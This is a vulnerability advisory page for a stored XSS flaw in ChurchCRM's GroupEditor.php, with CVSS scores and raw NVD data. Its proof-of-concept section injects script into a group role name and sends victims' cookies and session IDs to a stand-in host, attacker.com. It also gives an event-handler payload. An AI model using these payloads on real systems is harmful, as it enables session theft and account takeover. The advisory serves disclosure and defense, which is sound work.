Security Vulnerability Report
CVE-2025-68399 CVSS 5.4 MEDIUM

CVE-2025-68399

Published: 2025-12-17 22:16:02
Last Modified: 2025-12-18 16:47:12

Description

ChurchCRM is an open-source church management system. In versions prior to 6.5.4, the GroupEditor.php page is affected by a Stored Cross-Site Scripting (XSS) vulnerability. A user who creates a group role can inject JavaScript that is stored and later executed by the application. For this to work, the user must have permission to view and modify groups in the application. Version 6.5.4 fixes the issue.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (the Primary metric in the raw JSON below; the Secondary CVSS 4.0 vector recorded there scores 2.0, LOW, so the MEDIUM rating in the header is the v3.1 assessment)

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-68399 PoC - ChurchCRM Stored XSS in GroupEditor.php // Author: Security Researcher // Target: ChurchCRM < 6.5.4 // Step 1: Authenticate with ChurchCRM using a low-privilege account with group management permissions // POST /session/login const loginPayload = { email: '[email protected]', password: 'password123' }; // Step 2: Navigate to GroupEditor.php and intercept the group role creation request // GET /GroupEditor.php?GroupID=<group_id> // Step 3: Inject malicious JavaScript in the group role name field // POST /GroupEditor.php const xssPayload = { GroupID: 1, Action: 'AddRole', // Stored XSS payload - will be executed when page is viewed RoleName: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>', // Alternative payload - event handler RoleDescription: '" onmouseover="alert(document.domain)" x="' }; // Step 4: When other users visit GroupEditor.php, the XSS payload executes // The attacker's server receives the victim's cookies fetch('https://attacker.com/exploit', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ cookie: document.cookie, url: window.location.href, session: document.cookie.match(/CRM_SESSID=([^;]+)/)[1] }) });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68399", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:02.083", "lastModified": "2025-12-18T16:47:11.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. In versions prior to 6.5.4, there is a Stored Cross-Site Scripting (XSS) vulnerability within the GroupEditor.php page of the application. When a user attempts to create a group role, they can execute malicious JavaScript. However, for this to work, the user must have permission to view and modify groups in the application. Version 6.5.4 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.4", "matchCriteriaId": "2CE715A5-9E36-4DC7-94BC-511C43F8F3C6"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}